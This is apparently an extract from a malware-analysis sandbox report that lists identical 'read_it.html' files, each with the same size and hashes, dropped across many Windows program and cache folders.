c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\packages\vcruntimeminimum_x86\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\packages\vcruntimeadditional_x86\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\packages\vcruntimeminimum_amd64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\packages\vcruntimeadditional_amd64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\packages\vcruntimeminimum_amd64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\packages\vcruntimeadditional_x86\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\packages\vcruntimeminimum_x86\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\packages\vcruntimeadditional_amd64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\packages\vcruntimeminimum_x86\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\packages\patch\x64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\programdata\package cache\42d5bec7ddfbd49e76467529cbc2868987bf8460\packages\patch\x64\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\programdata\mozilla\logs\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\programdata\adobe\arm\reader_10.0.0\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\programdata\adobe\acrobat\10.0\replicate\security\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\mozilla maintenance service\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\microsoft visual studio 8\common7\ide\vsta\itemtemplates\visualbasic\1033\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\microsoft visual studio 8\common7\ide\vsta\itemtemplates\csharp\1033\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\microsoft analysis services\as oledb\10\resources\1033\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\microsoft analysis services\as oledb\10\cartridges\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\systemv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\pacific\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\indian\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\europe\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\etc\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\australia\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\atlantic\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\asia\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\antarctica\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\america\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\america\north_dakota\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\america\kentucky\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\america\indiana\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\america\argentina\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\zi\africa\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\security\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\management\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\jfr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\images\cursors\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\i386\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\fonts\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\ext\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\deploy\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\deploy\jqs\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\lib\cmm\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\java\jre7\bin\client\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\setup files\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\typesupport\unicode\mappings\win\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\typesupport\unicode\mappings\mac\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\typesupport\unicode\mappings\adobe\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\typesupport\unicode\icu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\saslprep\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\linguistics\providers\proximity\11.00\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\linguistics\languagenames2\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\font\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\font\pfm\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\resource\cidfont\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\tracker\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\spplugins\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins3d\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins3d\prc\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_ukr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_tur\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_slv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_sky\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_rus\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
